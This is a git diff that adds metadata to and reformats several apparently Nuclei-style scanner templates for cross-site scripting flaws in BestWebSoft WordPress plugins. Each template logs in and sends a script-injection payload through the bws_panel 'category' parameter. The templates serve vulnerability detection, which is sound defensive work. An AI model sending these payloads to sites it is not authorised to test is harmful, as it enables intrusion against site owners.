+++ b/http/cves/2017/CVE-2017-18542.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18542 - -info: - name: Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The zendesk-help-center plugin before 1.0.5 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18542 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18542 - - https://wordpress.org/plugins/zendesk-help-center/#developers - classification: - cve-id: CVE-2017-18542 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/zendesk-help-center/" - tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' +id: CVE-2017-18542 + +info: + name: Zendesk Help Center by BestWebSoft < 1.0.5 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The zendesk-help-center plugin before 1.0.5 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18542 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18542 + - https://wordpress.org/plugins/zendesk-help-center/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18542 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:zendesk_help_center:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: zendesk_help_center + framework: wordpress + publicwww-query: "/wp-content/plugins/zendesk-help-center/" + tags: cve,cve2017,wordpress,wp-plugin,bws-zendesk,wpscan,xss,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/zendesk-help-center/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Zendesk Help Center by BestWebSoft")' condition: and -# digest: 4b0a004830460221008141a35688966559c544153d6eea5e6d127464fc3314a4bfd02395b08db301a0022100a87d2505b3c392dd74b8e2117e1413b5a31a551522bca6287b8bff3db6eb7d16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a004830460221008141a35688966559c544153d6eea5e6d127464fc3314a4bfd02395b08db301a0022100a87d2505b3c392dd74b8e2117e1413b5a31a551522bca6287b8bff3db6eb7d16:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18556.yaml b/http/cves/2017/CVE-2017-18556.yaml index 914a68243c..394761029d 100644 --- a/http/cves/2017/CVE-2017-18556.yaml +++ b/http/cves/2017/CVE-2017-18556.yaml @@ -1,49 +1,57 @@ -id: CVE-2017-18556 - -info: - name: Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues. - remediation: Fixed in version 1.7.1 - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18556 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18556 - - https://wordpress.org/plugins/bws-google-analytics/#developers - classification: - cve-id: CVE-2017-18556 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/bws-google-analytics/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Google Analytics by BestWebSoft")' +id: CVE-2017-18556 + +info: + name: Google Analytics by BestWebSoft < 1.7.1 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-google-analytics plugin before 1.7.1 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.7.1 + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18556 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18556 + - https://wordpress.org/plugins/bws-google-analytics/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18556 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:google_analytics:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: google_analytics + framework: wordpress + publicwww-query: "/wp-content/plugins/bws-google-analytics/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-analytics,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-google-analytics/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Google Analytics by BestWebSoft")' condition: and -# digest: 4a0a0047304502210090cfc9a3f62440d9291bd70ac0fb27bd42ac141a70b9da03fc1a74ed17514067022057d5f1f652f6048f900dce49ede5dd2dbb46a33a25a8019a88e25a765725c395:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210090cfc9a3f62440d9291bd70ac0fb27bd42ac141a70b9da03fc1a74ed17514067022057d5f1f652f6048f900dce49ede5dd2dbb46a33a25a8019a88e25a765725c395:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18557.yaml b/http/cves/2017/CVE-2017-18557.yaml index f1048b10fd..7b550a85dd 100644 --- a/http/cves/2017/CVE-2017-18557.yaml +++ b/http/cves/2017/CVE-2017-18557.yaml @@ -1,49 +1,57 @@ -id: CVE-2017-18557 - -info: - name: Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The bws-google-maps plugin before 1.3.6 for WordPress has multiple XSS issues. - remediation: Fixed in version 1.3.6 - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18557 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18557 - - https://wordpress.org/plugins/bws-google-maps/#developers - classification: - cve-id: CVE-2017-18557 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/bws-google-maps/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Google Maps by BestWebSoft")' +id: CVE-2017-18557 + +info: + name: Google Maps by BestWebSoft < 1.3.6 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-google-maps plugin before 1.3.6 for WordPress has multiple XSS issues. + remediation: Fixed in version 1.3.6 + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18557 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18557 + - https://wordpress.org/plugins/bws-google-maps/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18557 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:google_maps:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: google_maps + framework: wordpress + publicwww-query: "/wp-content/plugins/bws-google-maps/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-google-maps,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-google-maps/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Google Maps by BestWebSoft")' condition: and -# digest: 490a0046304402206502239fa827677cdd00814c8c0126fc0ed4a6837f092ee6b2c41df48d3752ca022068a6225cfeb67cda5870e73ca3a4a66b3d72d583c24b91da97c1a7635a43a9a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402206502239fa827677cdd00814c8c0126fc0ed4a6837f092ee6b2c41df48d3752ca022068a6225cfeb67cda5870e73ca3a4a66b3d72d583c24b91da97c1a7635a43a9a5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18558.yaml b/http/cves/2017/CVE-2017-18558.yaml index f3776a3c85..975c2b6db8 100644 --- a/http/cves/2017/CVE-2017-18558.yaml +++ b/http/cves/2017/CVE-2017-18558.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18558 - -info: - name: Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The bws-testimonials plugin before 0.1.9 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18558 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18558 - - https://wordpress.org/plugins/bws-testimonials/#developers - classification: - cve-id: CVE-2017-18558 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/bws-testimonials/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Testimonials by BestWebSoft")' +id: CVE-2017-18558 + +info: + name: Testimonials by BestWebSoft < 0.1.9 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The bws-testimonials plugin before 0.1.9 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18558 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18558 + - https://wordpress.org/plugins/bws-testimonials/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18558 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:testimonials:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: testimonials + framework: wordpress + publicwww-query: "/wp-content/plugins/bws-testimonials/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-testimonials,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/bws-testimonials/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Testimonials by BestWebSoft")' condition: and -# digest: 4a0a004730450220012d9d5273fe258a88ae89d6ca8708fd7695057f241782fa24eeccd290d1071b0221009d9ffc19ba730a5e5d256009ad6698174b10b5e5526a1095b606a56f1c830600:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220012d9d5273fe258a88ae89d6ca8708fd7695057f241782fa24eeccd290d1071b0221009d9ffc19ba730a5e5d256009ad6698174b10b5e5526a1095b606a56f1c830600:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18562.yaml b/http/cves/2017/CVE-2017-18562.yaml index 9c6cf757a8..a9045d4f61 100644 --- a/http/cves/2017/CVE-2017-18562.yaml +++ b/http/cves/2017/CVE-2017-18562.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18562 - -info: - name: Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The error-log-viewer plugin before 1.0.6 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18562 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18562 - - https://wordpress.org/plugins/error-log-viewer/#developers - classification: - cve-id: CVE-2017-18562 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/error-log-viewer/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Error Log Viewer by BestWebSoft")' +id: CVE-2017-18562 + +info: + name: Error Log Viewer by BestWebSoft < 1.0.6 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The error-log-viewer plugin before 1.0.6 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18562 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18562 + - https://wordpress.org/plugins/error-log-viewer/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18562 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:error_log_viewer:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: error_log_viewer + framework: wordpress + publicwww-query: "/wp-content/plugins/error-log-viewer/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-error-log,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/error-log-viewer/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Error Log Viewer by BestWebSoft")' condition: and -# digest: 4a0a004730450220225816b2b8b2b19652fb0a6a723480ba7b1c9dc965d7210f28d686573ec433ea02210096efb9c959f59c613ccb31df44c4381612a84bd04ddb4a023c1b6a376bcc72d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220225816b2b8b2b19652fb0a6a723480ba7b1c9dc965d7210f28d686573ec433ea02210096efb9c959f59c613ccb31df44c4381612a84bd04ddb4a023c1b6a376bcc72d8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18564.yaml b/http/cves/2017/CVE-2017-18564.yaml index 9e415afb02..3ceb942bea 100644 --- a/http/cves/2017/CVE-2017-18564.yaml +++ b/http/cves/2017/CVE-2017-18564.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18564 - -info: - name: Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The sender plugin before 1.2.1 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18564 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18564 - - https://wordpress.org/plugins/sender/#developers - classification: - cve-id: CVE-2017-18564 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/sender/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/sender/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Sender by BestWebSoft")' +id: CVE-2017-18564 + +info: + name: Sender by BestWebSoft < 1.2.1 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The sender plugin before 1.2.1 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18564 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18564 + - https://wordpress.org/plugins/sender/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18564 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:sender:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: sender + framework: wordpress + publicwww-query: "/wp-content/plugins/sender/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-sender,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/sender/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Sender by BestWebSoft")' condition: and -# digest: 4a0a0047304502201d705ef779b17feede4822280704c756ee7b232dd04ae1f4fa65778129ce826c022100dc41e2352dafc5602681d1ce0e758a059e98002dbf62e0cfc7e4327b3a367a55:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201d705ef779b17feede4822280704c756ee7b232dd04ae1f4fa65778129ce826c022100dc41e2352dafc5602681d1ce0e758a059e98002dbf62e0cfc7e4327b3a367a55:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18565.yaml b/http/cves/2017/CVE-2017-18565.yaml index 5af76d8bc2..0a3400efce 100644 --- a/http/cves/2017/CVE-2017-18565.yaml +++ b/http/cves/2017/CVE-2017-18565.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18565 - -info: - name: Updater by BestWebSoft < 1.35 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The updater plugin before 1.35 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18565 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18565 - - https://wordpress.org/plugins/updater/#developers - classification: - cve-id: CVE-2017-18565 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/updater/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/updater/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "Updater by BestWebSoft")' +id: CVE-2017-18565 + +info: + name: Updater by BestWebSoft < 1.35 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The updater plugin before 1.35 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18565 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18565 + - https://wordpress.org/plugins/updater/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18565 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:updater:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: updater + framework: wordpress + publicwww-query: "/wp-content/plugins/updater/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-updater,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + log={{username}}&pwd={{password}}&wp-submit=Log+In + - | + GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 + Host: {{Hostname}} + - | + GET /wp-content/plugins/updater/readme.txt HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(header_2, "text/html")' + - 'contains(body_2, ">\">All")' + - 'contains(body_3, "Updater by BestWebSoft")' condition: and -# digest: 4a0a0047304502200b0eb8004d2340104845997841e5ff398ea97d2bf46c750a0322a91fdb675df8022100db7de84b70c1266a17c1cb72c97eca7d32617537456ed6b04493f372fcffb6ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200b0eb8004d2340104845997841e5ff398ea97d2bf46c750a0322a91fdb675df8022100db7de84b70c1266a17c1cb72c97eca7d32617537456ed6b04493f372fcffb6ec:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2017/CVE-2017-18566.yaml b/http/cves/2017/CVE-2017-18566.yaml index a58bcf55db..171c4ad8dd 100644 --- a/http/cves/2017/CVE-2017-18566.yaml +++ b/http/cves/2017/CVE-2017-18566.yaml @@ -1,48 +1,56 @@ -id: CVE-2017-18566 - -info: - name: User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting - author: luisfelipe146 - severity: medium - description: | - The user-role plugin before 1.5.6 for WordPress has multiple XSS issues. - reference: - - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 - - https://nvd.nist.gov/vuln/detail/CVE-2017-18566 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18566 - - https://wordpress.org/plugins/user-role/#developers - classification: - cve-id: CVE-2017-18566 - metadata: - max-request: 3 - verified: true - publicwww-query: "/wp-content/plugins/user-role/" - tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated - -http: - - raw: - - | - POST /wp-login.php HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - - log={{username}}&pwd={{password}}&wp-submit=Log+In - - - | - GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 - Host: {{Hostname}} - - - | - GET /wp-content/plugins/user-role/readme.txt HTTP/1.1 - Host: {{Hostname}} - - cookie-reuse: true - matchers: - - type: dsl - dsl: - - 'status_code_2 == 200' - - 'contains(header_2, "text/html")' - - 'contains(body_2, ">\">All")' - - 'contains(body_3, "User Role by BestWebSoft")' +id: CVE-2017-18566 + +info: + name: User Role by BestWebSoft < 1.5.6 - Cross-Site Scripting + author: luisfelipe146 + severity: medium + description: | + The user-role plugin before 1.5.6 for WordPress has multiple XSS issues. + reference: + - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694 + - https://nvd.nist.gov/vuln/detail/CVE-2017-18566 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18566 + - https://wordpress.org/plugins/user-role/#developers + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2017-18566 + cwe-id: CWE-79 + epss-score: 0.00078 + epss-percentile: 0.32773 + cpe: cpe:2.3:a:bestwebsoft:user_role:*:*:*:*:*:wordpress:*:* + metadata: + verified: true + max-request: 3 + vendor: bestwebsoft + product: user_role + framework: wordpress + publicwww-query: "/wp-content/plugins/user-role/" + tags: cve,cve2017,wordpress,wp-plugin,xss,bws-user-role,wpscan,authenticated + +http: + - raw: + - | + POST /wp-login.php HTTP/1.1 + Host: {{Hostname}} + 